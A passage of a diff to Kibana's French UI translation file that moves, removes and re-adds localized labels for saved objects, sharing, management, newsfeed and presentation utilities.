Votre administrateur possède les autorisations requises pour l'activer.", "kibana-react.noDataPage.elasticAgentCard.noPermission.title": "Contactez votre administrateur", - "kibana-react.noDataPage.elasticAgentCard.title": "Ajouter Elastic Agent", - "kibana-react.noDataPage.intro": "Ajoutez vos données pour commencer, ou {link} sur {solution}.", + "kibana-react.noDataPage.elasticAgentCard.title": "Ajouter Elastic Agent", "kibana-react.noDataPage.intro.link": "en savoir plus", "kibana-react.noDataPage.noDataCard.description": "Continuer sans collecter de données", "kibana-react.noDataPage.noDataPage.recommended": "Recommandé", - "kibana-react.noDataPage.welcomeTitle": "Bienvenue dans Elastic {solution}.", "kibana-react.pageFooter.changeDefaultRouteSuccessToast": "Page de destination mise à jour", "kibana-react.pageFooter.changeHomeRouteLink": "Afficher une page différente à la connexion", "kibana-react.pageFooter.makeDefaultRouteLink": "Choisir comme page de destination", "kibana-react.solutionNav.collapsibleLabel": "Réduire la navigation latérale", - "kibana-react.solutionNav.mobileTitleText": "Menu {solutionName}", "kibana-react.solutionNav.openLabel": "Ouvrir la navigation latérale", "kibana-react.tableListView.lastUpdatedColumnTitle": "Dernière mise à jour", - "kibana-react.tableListView.listing.createNewItemButtonLabel": "Créer {entityName}", - "kibana-react.tableListView.listing.deleteButtonMessage": "Supprimer {itemCount} {entityName}", - "kibana-react.tableListView.listing.deleteConfirmModalDescription": "Vous ne pourrez pas récupérer les {entityNamePlural} supprimés.", - "kibana-react.tableListView.listing.deleteSelectedConfirmModal.title": "Supprimer {itemCount} {entityName} ?", "kibana-react.tableListView.listing.deleteSelectedItemsConfirmModal.cancelButtonLabel": "Annuler", "kibana-react.tableListView.listing.deleteSelectedItemsConfirmModal.confirmButtonLabel": "Supprimer", 
"kibana-react.tableListView.listing.deleteSelectedItemsConfirmModal.confirmButtonLabelDeleting": "Suppression", - "kibana-react.tableListView.listing.fetchErrorDescription": "Le listing {entityName} n'a pas pu être récupéré : {message}.", "kibana-react.tableListView.listing.fetchErrorTitle": "Échec de la récupération du listing", "kibana-react.tableListView.listing.listingLimitExceeded.advancedSettingsLinkText": "Paramètres avancés", - "kibana-react.tableListView.listing.listingLimitExceededDescription": "Vous avez {totalItems} {entityNamePlural}, mais votre paramètre {listingLimitText} empêche le tableau ci-dessous d'en afficher plus de {listingLimitValue}. Vous pouvez modifier ce paramètre sous {advancedSettingsLink}.", - "kibana-react.tableListView.listing.listingLimitExceededDescriptionNoPermissions": "Vous avez {totalItems} {entityNamePlural}, mais votre paramètre {listingLimitText} empêche le tableau ci-dessous d'en afficher plus de {listingLimitValue}. Contactez l'administrateur système pour modifier ce paramètre.", "kibana-react.tableListView.listing.listingLimitExceededTitle": "Limite de listing dépassée", "kibana-react.tableListView.listing.table.actionTitle": "Actions", "kibana-react.tableListView.listing.table.editActionDescription": "Modifier", - "kibana-react.tableListView.listing.unableToDeleteDangerMessage": "Impossible de supprimer la/le/les {entityName}(s)", "kibana-react.tableListView.updatedDateUnknownLabel": "Dernière mise à jour inconnue", - "kibanaOverview.addData.sampleDataButtonLabel": "Essayer l’exemple de données", - "kibanaOverview.addData.sectionTitle": "Ingérer des données", - "kibanaOverview.apps.title": "Explorer les applications", - "kibanaOverview.breadcrumbs.title": "Analytique", - "kibanaOverview.header.title": "Analytique", - "kibanaOverview.kibana.solution.description": "Explorez, visualisez et analysez vos données à l'aide d'une puissante suite d'outils et d'applications analytiques.", - "kibanaOverview.kibana.solution.title": 
"Analytique", - "kibanaOverview.manageData.sectionTitle": "Gérer vos données", - "kibanaOverview.more.title": "Toujours plus avec Elastic", - "kibanaOverview.news.title": "Nouveautés", - "lists.exceptions.doesNotExistOperatorLabel": "n'existe pas", - "lists.exceptions.existsOperatorLabel": "existe", - "lists.exceptions.isInListOperatorLabel": "est dans la liste", - "lists.exceptions.isNotInListOperatorLabel": "n'est pas dans la liste", - "lists.exceptions.isNotOneOfOperatorLabel": "n'est pas l'une des options suivantes", - "lists.exceptions.isNotOperatorLabel": "n'est pas", - "lists.exceptions.isOneOfOperatorLabel": "est l'une des options suivantes", - "lists.exceptions.isOperatorLabel": "est", - "lists.exceptions.matchesOperatorLabel": "correspond à", - "management.breadcrumb": "Gestion de la Suite", "management.landing.header": "Bienvenue dans Gestion de la Suite {version}", + "management.breadcrumb": "Gestion de la Suite", "management.landing.subhead": "Gérez vos index, vues de données, objets enregistrés, paramètres Kibana et plus encore.", "management.landing.text": "Vous trouverez une liste complète des applications dans le menu de gauche.", "management.nav.label": "Gestion", 
@@ -5265,29 +4385,29 @@
 "management.sections.section.title": "Sécurité",
 "management.sections.stackTip": "Gérez votre licence et mettez la Suite à niveau.",
 "management.sections.stackTitle": "Suite",
- "management.stackManagement.managementDescription": "La console centrale de gestion de la Suite Elastic.",
+ "management.stackManagement.managementDescription": "La console centrale de gestion de la Suite Elastic.",
 "management.stackManagement.managementLabel": "Gestion de la Suite",
 "management.stackManagement.title": "Gestion de la Suite",
- "monaco.painlessLanguage.autocomplete.docKeywordDescription": "Accéder à une valeur de champ dans un script au moyen de la syntaxe doc['field_name']",
- "monaco.painlessLanguage.autocomplete.emitKeywordDescription": "Émettre une valeur sans rien renvoyer",
- "monaco.painlessLanguage.autocomplete.fieldValueDescription": "Récupérer la valeur du champ \"{fieldName}\"",
- "monaco.painlessLanguage.autocomplete.paramsKeywordDescription": "Accéder aux variables transmises dans le script",
+ "newsfeed.flyoutList.versionTextLabel": "{version}",
 "newsfeed.emptyPrompt.noNewsText": "Si votre instance Kibana n'a pas accès à Internet, demandez à votre administrateur de désactiver cette fonctionnalité. 
Sinon, nous continuerons d'essayer de récupérer les actualités.",
- "newsfeed.emptyPrompt.noNewsTitle": "Pas d'actualités ?",
+ "newsfeed.emptyPrompt.noNewsTitle": "Pas d'actualités ?",
 "newsfeed.flyoutList.closeButtonLabel": "Fermer",
- "newsfeed.flyoutList.versionTextLabel": "{version}",
 "newsfeed.flyoutList.whatsNewTitle": "Nouveautés Elastic",
 "newsfeed.headerButton.readAriaLabel": "Menu du fil d'actualités – Tous les éléments lus",
 "newsfeed.headerButton.unreadAriaLabel": "Menu du fil d'actualités – Éléments non lus disponibles",
 "newsfeed.loadingPrompt.gettingNewsText": "Obtention des dernières actualités…",
+ "presentationUtil.expressionInput.argReferenceAliasesDetail": "{BOLD_MD_TOKEN}Alias{BOLD_MD_TOKEN} : {aliases}",
+ "presentationUtil.expressionInput.argReferenceDefaultDetail": "{BOLD_MD_TOKEN}Par défaut{BOLD_MD_TOKEN} : {defaultVal}",
+ "presentationUtil.expressionInput.argReferenceRequiredDetail": "{BOLD_MD_TOKEN}Requis{BOLD_MD_TOKEN} : {required}",
+ "presentationUtil.expressionInput.argReferenceTypesDetail": "{BOLD_MD_TOKEN}Types{BOLD_MD_TOKEN} : {types}",
+ "presentationUtil.expressionInput.functionReferenceAccepts": "{BOLD_MD_TOKEN}Accepte{BOLD_MD_TOKEN} : {acceptTypes}",
+ "presentationUtil.expressionInput.functionReferenceReturns": "{BOLD_MD_TOKEN}Renvoie{BOLD_MD_TOKEN} : {returnType}",
+ "presentationUtil.labs.components.disabledStatusMessage": "Par défaut : {status}",
+ "presentationUtil.labs.components.enabledStatusMessage": "Par défaut : {status}",
+ "presentationUtil.labs.components.noProjectsinSolutionMessage": "Aucun atelier actuellement dans {solutionName}.",
+ "presentationUtil.solutionToolbar.quickButton.ariaButtonLabel": "Créer {createType}",
 "presentationUtil.dashboardPicker.searchDashboardPlaceholder": "Recherche dans les tableaux de bord…",
 "presentationUtil.dataViewPicker.changeDataViewTitle": "Vue de données",
- "presentationUtil.expressionInput.argReferenceAliasesDetail": "{BOLD_MD_TOKEN}Alias{BOLD_MD_TOKEN} : {aliases}",
- 
"presentationUtil.expressionInput.argReferenceDefaultDetail": "{BOLD_MD_TOKEN}Par défaut{BOLD_MD_TOKEN} : {defaultVal}",
- "presentationUtil.expressionInput.argReferenceRequiredDetail": "{BOLD_MD_TOKEN}Requis{BOLD_MD_TOKEN} : {required}",
- "presentationUtil.expressionInput.argReferenceTypesDetail": "{BOLD_MD_TOKEN}Types{BOLD_MD_TOKEN} : {types}",
- "presentationUtil.expressionInput.functionReferenceAccepts": "{BOLD_MD_TOKEN}Accepte{BOLD_MD_TOKEN} : {acceptTypes}",
- "presentationUtil.expressionInput.functionReferenceReturns": "{BOLD_MD_TOKEN}Renvoie{BOLD_MD_TOKEN} : {returnType}",
 "presentationUtil.fieldPicker.noDataViewLabel": "Aucune vue de données sélectionnée",
 "presentationUtil.fieldPicker.noFieldsLabel": "Aucun champ correspondant",
 "presentationUtil.fieldSearch.fieldFilterButtonLabel": "Filtrer par type",
@@ -5298,12 +4418,9 @@
 "presentationUtil.labs.components.calloutHelp": "Actualiser pour appliquer les modifications",
 "presentationUtil.labs.components.closeButtonLabel": "Fermer",
 "presentationUtil.labs.components.descriptionMessage": "Essayez des fonctionnalités en cours ou en version d'évaluation technique.",
- "presentationUtil.labs.components.disabledStatusMessage": "Par défaut : {status}",
- "presentationUtil.labs.components.enabledStatusMessage": "Par défaut : {status}",
 "presentationUtil.labs.components.kibanaSwitchHelp": "Active cet atelier pour tous les utilisateurs Kibana.",
 "presentationUtil.labs.components.kibanaSwitchName": "Kibana",
 "presentationUtil.labs.components.labFlagsLabel": "Indicateurs d'atelier",
- "presentationUtil.labs.components.noProjectsinSolutionMessage": "Aucun atelier actuellement dans {solutionName}.",
 "presentationUtil.labs.components.noProjectsMessage": "Aucun atelier actuellement disponible.",
 "presentationUtil.labs.components.overrideFlagsLabel": "Remplacements",
 "presentationUtil.labs.components.overridenIconTipLabel": "Valeur par défaut remplacée",
@@ -5328,18 +4445,21 @@
 "presentationUtil.saveModalDashboard.saveToLibraryLabel": "Enregistrer et ajouter à la bibliothèque",
 "presentationUtil.solutionToolbar.editorMenuButtonLabel": "Tous les éditeurs",
 "presentationUtil.solutionToolbar.libraryButtonLabel": "Ajouter depuis la bibliothèque",
- "presentationUtil.solutionToolbar.quickButton.ariaButtonLabel": "Créer {createType}",
 "presentationUtil.solutionToolbar.quickButton.legendLabel": "Création rapide",
+ "savedObjects.confirmModal.overwriteConfirmationMessage": "Êtes-vous sûr de vouloir écraser {title} ?",
+ "savedObjects.confirmModal.overwriteTitle": "Écraser {name} ?",
+ "savedObjects.confirmModal.saveDuplicateButtonLabel": "Enregistrer {name}",
+ "savedObjects.confirmModal.saveDuplicateConfirmationMessage": "Il y a déjà une occurrence de {name} avec le titre \"{title}\". Voulez-vous tout de même enregistrer ?",
+ "savedObjects.saveModal.duplicateTitleLabel": "Ce {objectType} existe déjà.",
+ "savedObjects.saveModal.saveAsNewLabel": "Enregistrer en tant que nouveau {objectType}",
+ "savedObjects.saveModal.saveTitle": "Enregistrer {objectType}",
+ "savedObjects.saveModalOrigin.originAfterSavingSwitchLabel": "{originVerb} à {origin} après l'enregistrement",
 "savedObjects.advancedSettings.listingLimitText": "Nombre d'objets à récupérer pour les pages de listing",
 "savedObjects.advancedSettings.listingLimitTitle": "Limite de listing d’objets",
 "savedObjects.advancedSettings.perPageText": "Nombre d'objets à afficher par page dans la boîte de dialogue de chargement",
 "savedObjects.advancedSettings.perPageTitle": "Objets par page",
 "savedObjects.confirmModal.cancelButtonLabel": "Annuler",
 "savedObjects.confirmModal.overwriteButtonLabel": "Écraser",
- "savedObjects.confirmModal.overwriteConfirmationMessage": "Êtes-vous sûr de vouloir écraser {title} ?",
- "savedObjects.confirmModal.overwriteTitle": "Écraser {name} ?",
- "savedObjects.confirmModal.saveDuplicateButtonLabel": "Enregistrer {name}",
- 
"savedObjects.confirmModal.saveDuplicateConfirmationMessage": "Il y a déjà une occurrence de {name} avec le titre \"{title}\". Voulez-vous tout de même enregistrer ?",
 "savedObjects.finder.filterButtonLabel": "Types",
 "savedObjects.finder.searchPlaceholder": "Rechercher…",
 "savedObjects.finder.sortAsc": "Croissant",
@@ -5351,64 +4471,70 @@
 "savedObjects.saveModal.cancelButtonLabel": "Annuler",
 "savedObjects.saveModal.descriptionLabel": "Description",
 "savedObjects.saveModal.duplicateTitleDescription": "L'enregistrement de \"{title}\" crée un doublon de titre.",
- "savedObjects.saveModal.duplicateTitleLabel": "Ce {objectType} existe déjà.",
- "savedObjects.saveModal.saveAsNewLabel": "Enregistrer en tant que nouveau {objectType}",
 "savedObjects.saveModal.saveButtonLabel": "Enregistrer",
- "savedObjects.saveModal.saveTitle": "Enregistrer {objectType}",
 "savedObjects.saveModal.titleLabel": "Titre",
 "savedObjects.saveModalOrigin.addToOriginLabel": "Ajouter",
- "savedObjects.saveModalOrigin.originAfterSavingSwitchLabel": "{originVerb} à {origin} après l'enregistrement",
 "savedObjects.saveModalOrigin.returnToOriginLabel": "Renvoyer",
 "savedObjects.saveModalOrigin.saveAndReturnLabel": "Enregistrer et revenir",
- "savedObjectsManagement.breadcrumb.index": "Objets enregistrés",
 "savedObjectsManagement.breadcrumb.inspect": "Inspecter {savedObjectType}",
- "savedObjectsManagement.copyToSpace.actionDescription": "Effectuer une copie de cet objet enregistré dans un ou plusieurs espaces",
- "savedObjectsManagement.copyToSpace.actionTitle": "Copier vers les espaces",
- "savedObjectsManagement.deleteConfirm.modalDeleteButtonLabel": "Supprimer",
- "savedObjectsManagement.deleteConfirm.modalDescription": "Cette action supprime définitivement l'objet de Kibana.",
- "savedObjectsManagement.deleteConfirm.modalTitle": "Supprimer \"{title}\" ?",
- "savedObjectsManagement.deleteSavedObjectsConfirmModalDescription": "Cette action supprimera les objets enregistrés suivants :",
- "savedObjectsManagement.importSummary.createdCountHeader": "{createdCount} nouveau(x)",
- "savedObjectsManagement.importSummary.createdOutcomeLabel": "Créé",
+ "savedObjectsManagement.importSummary.createdCountHeader": "{createdCount} nouveau(x)",
 "savedObjectsManagement.importSummary.errorCountHeader": "{errorCount} erreur(s)",
 "savedObjectsManagement.importSummary.errorOutcomeLabel": "{errorMessage}",
- "savedObjectsManagement.importSummary.headerLabel": "{importCount, plural, one {1 objet importé} other {# objets importés}}",
+ "savedObjectsManagement.importSummary.headerLabel": "{importCount, plural, one {1 objet importé} other {# objets importés}}",
 "savedObjectsManagement.importSummary.overwrittenCountHeader": "{overwrittenCount} écrasé(s)",
+ "savedObjectsManagement.objectsTable.deleteConfirmModal.cannotDeleteCallout.content": "{objectCount, plural, one {# objet est masqué et ne peut pas être supprimé} other {# objets sont masqués et ne peuvent pas être supprimés}}. {objectCount, plural, one {Il a été exclu} other {Ils ont été exclus}} du récapitulatif du tableau.",
+ "savedObjectsManagement.objectsTable.deleteConfirmModal.sharedObjectsCallout.title": "{sharedObjectsCount, plural, one {# objet enregistré est partagé} other {# de vos objets enregistrés sont partagés}}.",
+ "savedObjectsManagement.objectsTable.deleteSavedObjectsConfirmModal.deleteButtonLabel": "Supprimer {objectsCount, plural, one {# objet} other {# objets}}",
+ "savedObjectsManagement.objectsTable.export.toastErrorMessage": "Impossible de générer l'export : {error}",
+ "savedObjectsManagement.objectsTable.exportObjectsConfirmModalTitle": "Exporter {filteredItemCount, plural, one {# objet} other {# objets}}",
+ "savedObjectsManagement.objectsTable.flyout.importFileErrorMessage": "Impossible de traiter le fichier en raison d'une erreur : \"{error}\".",
+ "savedObjectsManagement.objectsTable.flyout.indexPatternConflictsDescription": "Les objets enregistrés suivants utilisent des vues de données qui n'existent pas. Veuillez sélectionner les vues de données que vous souhaitez réassocier. 
Vous pouvez {indexPatternLink} si nécessaire.",
+ "savedObjectsManagement.objectsTable.header.exportButtonLabel": "Exporter {filteredCount, plural, one{# objet} other {# objets}}",
+ "savedObjectsManagement.objectsTable.overwriteModal.body.ambiguousConflict": "\"{title}\" est en conflit avec plusieurs objets existants. En écraser un ?",
+ "savedObjectsManagement.objectsTable.overwriteModal.body.conflict": "\"{title}\" est en conflit avec un objet existant. L'écraser ?",
+ "savedObjectsManagement.objectsTable.overwriteModal.title": "Écraser {type} ?",
+ "savedObjectsManagement.objectsTable.relationships.relationshipsTitle": "Voici les objets enregistrés associés à {title}. La suppression de ce {type} a un impact sur ses objets parents, mais pas sur ses enfants.",
+ "savedObjectsManagement.objectsTable.table.tooManyResultsLabel": "Affichage de {limit} sur {totalItemCount, plural, one {# objet} other {# objets}}",
+ "savedObjectsManagement.view.howToFixErrorDescription": "Si vous savez à quoi cette erreur fait référence, vous pouvez utiliser les {savedObjectsApis} pour la corriger. 
Sinon, cliquez sur le bouton Supprimer ci-dessus.",
+ "savedObjectsManagement.view.inspectCodeEditorAriaLabel": "inspecter { title }",
+ "savedObjectsManagement.view.inspectItemTitle": "Inspecter {title}",
+ "savedObjectsManagement.view.viewItemButtonLabel": "Afficher {title}",
+ "savedObjectsManagement.breadcrumb.index": "Objets enregistrés",
+ "savedObjectsManagement.copyToSpace.actionDescription": "Effectuer une copie de cet objet enregistré dans un ou plusieurs espaces",
+ "savedObjectsManagement.copyToSpace.actionTitle": "Copier vers les espaces",
+ "savedObjectsManagement.deleteConfirm.modalDeleteButtonLabel": "Supprimer",
+ "savedObjectsManagement.deleteConfirm.modalDescription": "Cette action supprime définitivement l'objet de Kibana.",
+ "savedObjectsManagement.deleteConfirm.modalTitle": "Supprimer \"{title}\" ?",
+ "savedObjectsManagement.deleteSavedObjectsConfirmModalDescription": "Cette action supprimera les objets enregistrés suivants :",
+ "savedObjectsManagement.importSummary.createdOutcomeLabel": "Créé",
 "savedObjectsManagement.importSummary.overwrittenOutcomeLabel": "Écrasé",
 "savedObjectsManagement.importSummary.warnings.defaultButtonLabel": "Go",
 "savedObjectsManagement.managementSectionLabel": "Objets enregistrés",
 "savedObjectsManagement.objects.savedObjectsDescription": "Importez, exportez et gérez vos objets enregistrés.",
 "savedObjectsManagement.objects.savedObjectsTitle": "Objets enregistrés",
- "savedObjectsManagement.objectsTable.deleteConfirmModal.cannotDeleteCallout.content": "{objectCount, plural, one {# objet est masqué et ne peut pas être supprimé} other {# objets sont masqués et ne peuvent pas être supprimés}}. 
{objectCount, plural, one {Il a été exclu} other {Ils ont été exclus}} du récapitulatif du tableau.",
 "savedObjectsManagement.objectsTable.deleteConfirmModal.cannotDeleteCallout.title": "Certains objets ne peuvent pas être supprimés",
 "savedObjectsManagement.objectsTable.deleteConfirmModal.sharedObjectsCallout.content": "Les objets partagés sont supprimés de tous les espaces dans lesquels ils se trouvent.",
- "savedObjectsManagement.objectsTable.deleteConfirmModal.sharedObjectsCallout.title": "{sharedObjectsCount, plural, one {# objet enregistré est partagé} other {# de vos objets enregistrés sont partagés}}.",
 "savedObjectsManagement.objectsTable.deleteSavedObjectsConfirmModal.cancelButtonLabel": "Annuler",
- "savedObjectsManagement.objectsTable.deleteSavedObjectsConfirmModal.deleteButtonLabel": "Supprimer {objectsCount, plural, one {# objet} other {# objets}}",
- "savedObjectsManagement.objectsTable.deleteSavedObjectsConfirmModal.idColumnName": "ID",
+ "savedObjectsManagement.objectsTable.deleteSavedObjectsConfirmModal.idColumnName": "Id",
 "savedObjectsManagement.objectsTable.deleteSavedObjectsConfirmModal.titleColumnName": "Titre",
 "savedObjectsManagement.objectsTable.deleteSavedObjectsConfirmModal.typeColumnName": "Type",
 "savedObjectsManagement.objectsTable.deleteSavedObjectsConfirmModalTitle": "Supprimer les objets enregistrés",
 "savedObjectsManagement.objectsTable.export.successNotification": "Votre fichier est en cours de téléchargement en arrière-plan.",
 "savedObjectsManagement.objectsTable.export.successWithExcludedObjectsNotification": "Votre fichier est en cours de téléchargement en arrière-plan. Certains objets ont été exclus de l'export. Vous trouverez la liste des objets exclus à la dernière ligne du fichier exporté.",
 "savedObjectsManagement.objectsTable.export.successWithMissingRefsNotification": "Votre fichier est en cours de téléchargement en arrière-plan. Certains objets associés sont introuvables. 
Vous trouverez la liste des objets manquants à la dernière ligne du fichier exporté.",
- "savedObjectsManagement.objectsTable.export.toastErrorMessage": "Impossible de générer l'export : {error}",
 "savedObjectsManagement.objectsTable.exportObjectsConfirmModal.cancelButtonLabel": "Annuler",
 "savedObjectsManagement.objectsTable.exportObjectsConfirmModal.exportAllButtonLabel": "Exporter tout",
 "savedObjectsManagement.objectsTable.exportObjectsConfirmModal.exportOptionsLabel": "Options",
 "savedObjectsManagement.objectsTable.exportObjectsConfirmModal.includeReferencesDeepLabel": "Inclure les objets associés",
 "savedObjectsManagement.objectsTable.exportObjectsConfirmModalDescription": "Sélectionner les types d'objet à exporter",
- "savedObjectsManagement.objectsTable.exportObjectsConfirmModalTitle": "Exporter {filteredItemCount, plural, one {# objet} other {# objets}}",
 "savedObjectsManagement.objectsTable.flyout.errorCalloutTitle": "Désolé, une erreur est survenue.",
 "savedObjectsManagement.objectsTable.flyout.import.cancelButtonLabel": "Annuler",
 "savedObjectsManagement.objectsTable.flyout.import.confirmButtonLabel": "Importer",
- "savedObjectsManagement.objectsTable.flyout.importFileErrorMessage": "Impossible de traiter le fichier en raison d'une erreur : \"{error}\".",
 "savedObjectsManagement.objectsTable.flyout.importPromptText": "Importer",
 "savedObjectsManagement.objectsTable.flyout.importSavedObjectTitle": "Importer les objets enregistrés",
 "savedObjectsManagement.objectsTable.flyout.importSuccessful.confirmAllChangesButtonLabel": "Confirmer toutes les modifications",
 "savedObjectsManagement.objectsTable.flyout.importSuccessful.confirmButtonLabel": "Terminé",
 "savedObjectsManagement.objectsTable.flyout.indexPatternConflictsCalloutLinkText": "créer une nouvelle vue de données",
- "savedObjectsManagement.objectsTable.flyout.indexPatternConflictsDescription": "Les objets enregistrés suivants utilisent des vues de données qui n'existent pas. 
Veuillez sélectionner les vues de données que vous souhaitez réassocier. Vous pouvez {indexPatternLink} si nécessaire.",
 "savedObjectsManagement.objectsTable.flyout.indexPatternConflictsTitle": "Conflits de vues de données",
 "savedObjectsManagement.objectsTable.flyout.renderConflicts.columnCountDescription": "Nombre d'objets concernés",
 "savedObjectsManagement.objectsTable.flyout.renderConflicts.columnCountName": "Décompte",
@@ -5418,7 +4544,6 @@
 "savedObjectsManagement.objectsTable.flyout.renderConflicts.columnSampleOfAffectedObjectsDescription": "Exemple d'objets concernés",
 "savedObjectsManagement.objectsTable.flyout.renderConflicts.columnSampleOfAffectedObjectsName": "Exemple d'objets concernés",
 "savedObjectsManagement.objectsTable.flyout.selectFileToImportFormRowLabel": "Sélectionner un fichier à importer",
- "savedObjectsManagement.objectsTable.header.exportButtonLabel": "Exporter {filteredCount, plural, one{# objet} other {# objets}}",
 "savedObjectsManagement.objectsTable.header.importButtonLabel": "Importer",
 "savedObjectsManagement.objectsTable.header.refreshButtonLabel": "Actualiser",
 "savedObjectsManagement.objectsTable.header.savedObjectsTitle": "Objets enregistrés",
@@ -5431,12 +4556,9 @@
 "savedObjectsManagement.objectsTable.importModeControl.overwrite.disabledLabel": "Demander une action en cas de conflit",
 "savedObjectsManagement.objectsTable.importModeControl.overwrite.enabledLabel": "Écraser automatiquement les conflits",
 "savedObjectsManagement.objectsTable.importSummary.unsupportedTypeError": "Type d'objet non pris en charge",
- "savedObjectsManagement.objectsTable.overwriteModal.body.ambiguousConflict": "\"{title}\" est en conflit avec plusieurs objets existants. En écraser un ?",
- "savedObjectsManagement.objectsTable.overwriteModal.body.conflict": "\"{title}\" est en conflit avec un objet existant. L'écraser ?",
 "savedObjectsManagement.objectsTable.overwriteModal.cancelButtonText": "Ignorer",
 "savedObjectsManagement.objectsTable.overwriteModal.overwriteButtonText": "Écraser",
 "savedObjectsManagement.objectsTable.overwriteModal.selectControlLabel": "ID d'objet",
- "savedObjectsManagement.objectsTable.overwriteModal.title": "Écraser {type} ?",
 "savedObjectsManagement.objectsTable.relationships.columnActions.inspectActionDescription": "Inspecter cet objet enregistré",
 "savedObjectsManagement.objectsTable.relationships.columnActions.inspectActionName": "Inspecter",
 "savedObjectsManagement.objectsTable.relationships.columnActionsName": "Actions",
@@ -5452,7 +4574,6 @@
 "savedObjectsManagement.objectsTable.relationships.columnTypeDescription": "Type de l'objet enregistré",
 "savedObjectsManagement.objectsTable.relationships.columnTypeName": "Type",
 "savedObjectsManagement.objectsTable.relationships.invalidRelationShip": "Cet objet enregistré présente des relations non valides.",
- "savedObjectsManagement.objectsTable.relationships.relationshipsTitle": "Voici les objets enregistrés associés à {title}. La suppression de ce {type} a un impact sur ses objets parents, mais pas sur ses enfants.",
 "savedObjectsManagement.objectsTable.relationships.renderErrorMessage": "Erreur",
 "savedObjectsManagement.objectsTable.relationships.search.filters.relationship.childAsValue.view": "Enfant",
 "savedObjectsManagement.objectsTable.relationships.search.filters.relationship.name": "Relation directe",
@@ -5473,7 +4594,6 @@
 "savedObjectsManagement.objectsTable.table.exportButtonLabel": "Exporter",
 "savedObjectsManagement.objectsTable.table.exportPopoverButtonLabel": "Exporter",
 "savedObjectsManagement.objectsTable.table.lastUpdatedColumnTitle": "Dernière mise à jour",
- "savedObjectsManagement.objectsTable.table.tooManyResultsLabel": "Affichage de {limit} sur {totalItemCount, plural, one {# objet} other {# objets}}",
 "savedObjectsManagement.objectsTable.table.typeFilterName": "Type",
 "savedObjectsManagement.objectsTable.table.updatedDateUnknownLabel": "Dernière mise à jour inconnue",
 "savedObjectsManagement.objectsTable.unableFindSavedObjectNotificationMessage": "Objet enregistré introuvable",
@@ -5485,73 +4605,78 @@
 "savedObjectsManagement.shareToSpace.columnTitle": "Espaces",
 "savedObjectsManagement.shareToSpace.globalObjectTypeContent": "Cet objet enregistré est disponible dans tous les espaces et ne peut pas être modifié.",
 "savedObjectsManagement.shareToSpace.globalObjectTypeTitle": "Objet enregistré global",
- "savedObjectsManagement.shareToSpace.isolatedObjectTypeContent": "Cet objet enregistré est disponible dans un seul espace ; il ne peut pas être attribué à plusieurs espaces.",
+ "savedObjectsManagement.shareToSpace.isolatedObjectTypeContent": "Cet objet enregistré est disponible dans un seul espace ; il ne peut pas être attribué à plusieurs espaces.",
 "savedObjectsManagement.shareToSpace.isolatedObjectTypeTitle": "Objet enregistré isolé",
 "savedObjectsManagement.shareToSpace.shareableSoonObjectTypeContent": "Cet objet enregistré est disponible dans un seul espace. Dans une prochaine version, vous pourrez l'attribuer à plusieurs espaces.",
- "savedObjectsManagement.shareToSpace.shareableSoonObjectTypeTitle": "Bientôt disponible : Attribuer un objet enregistré à plusieurs espaces",
+ "savedObjectsManagement.shareToSpace.shareableSoonObjectTypeTitle": "Bientôt disponible : Attribuer un objet enregistré à plusieurs espaces",
 "savedObjectsManagement.view.copyToClipboardLabel": "Copier dans le presse-papiers",
 "savedObjectsManagement.view.deleteItemButtonLabel": "Supprimer",
 "savedObjectsManagement.view.fieldDoesNotExistErrorMessage": "Un champ associé à cet objet n'existe plus dans la vue de données.",
- "savedObjectsManagement.view.howToFixErrorDescription": "Si vous savez à quoi cette erreur fait référence, vous pouvez utiliser les {savedObjectsApis} pour la corriger. 
Sinon, cliquez sur le bouton Supprimer ci-dessus.",
 "savedObjectsManagement.view.howToFixErrorDescriptionLinkText": "API des objets enregistrés",
 "savedObjectsManagement.view.indexPatternDoesNotExistErrorMessage": "La vue de données associée à cet objet n'existe plus.",
- "savedObjectsManagement.view.inspectCodeEditorAriaLabel": "inspecter { title }",
- "savedObjectsManagement.view.inspectItemTitle": "Inspecter {title}",
 "savedObjectsManagement.view.savedObjectProblemErrorMessage": "Un problème est survenu avec cet objet enregistré.",
 "savedObjectsManagement.view.savedSearchDoesNotExistErrorMessage": "La recherche enregistrée associée à cet objet n'existe plus.",
- "savedObjectsManagement.view.viewItemButtonLabel": "Afficher {title}",
- "share.advancedSettings.csv.quoteValuesText": "Les valeurs doivent-elles être mises entre guillemets dans les exportations CSV ?",
- "share.advancedSettings.csv.quoteValuesTitle": "Mettre les valeurs CSV entre guillemets",
+ "share.contextMenuTitle": "Partager ce {objectType}",
+ "share.urlPanel.canNotShareAsSavedObjectHelpText": "Impossible de partager comme objet enregistré tant que {objectType} n'a pas été enregistré.",
+ "share.urlPanel.savedObjectDescription": "Vous pouvez partager cette URL avec des personnes pour leur permettre de charger la version enregistrée la plus récente de ce {objectType}.",
+ "share.urlPanel.snapshotDescription": "Les URL de snapshot encodent l'état actuel de {objectType} dans l'URL elle-même. Les modifications apportées au {objectType} enregistré ne seront pas visibles via cette URL.",
+ "share.urlPanel.unableCreateShortUrlErrorMessage": "Impossible de créer une URL courte. 
Erreur : {errorMessage}.",
+ "share.urlService.redirect.RedirectManager.locatorNotFound": "Le localisateur [ID = {id}] n'existe pas.",
+ "share.advancedSettings.csv.quoteValuesText": "Les valeurs doivent-elles être mises entre guillemets dans les exportations CSV ?",
+ "share.advancedSettings.csv.quoteValuesTitle": "Mettre les valeurs CSV entre guillemets",
 "share.advancedSettings.csv.separatorText": "Séparer les valeurs exportées avec cette chaîne",
- "share.advancedSettings.csv.separatorTitle": "Séparateur CSV",
+ "share.advancedSettings.csv.separatorTitle": "Séparateur CSV",
 "share.contextMenu.embedCodeLabel": "Incorporer le code",
 "share.contextMenu.embedCodePanelTitle": "Incorporer le code",
 "share.contextMenu.permalinkPanelTitle": "Permalien",
 "share.contextMenu.permalinksLabel": "Permaliens",
- "share.contextMenuTitle": "Partager ce {objectType}",
- "share.urlPanel.canNotShareAsSavedObjectHelpText": "Impossible de partager comme objet enregistré tant que {objectType} n'a pas été enregistré.",
 "share.urlPanel.copyIframeCodeButtonLabel": "Copier le code iFrame",
 "share.urlPanel.copyLinkButtonLabel": "Copier le lien",
 "share.urlPanel.generateLinkAsLabel": "Générer le lien en tant que",
 "share.urlPanel.publicUrlHelpText": "Utilisez l'URL publique pour partager avec tout le monde. Elle permet un accès anonyme en une étape, en supprimant l'invite de connexion.",
 "share.urlPanel.publicUrlLabel": "URL publique",
- "share.urlPanel.savedObjectDescription": "Vous pouvez partager cette URL avec des personnes pour leur permettre de charger la version enregistrée la plus récente de ce {objectType}.",
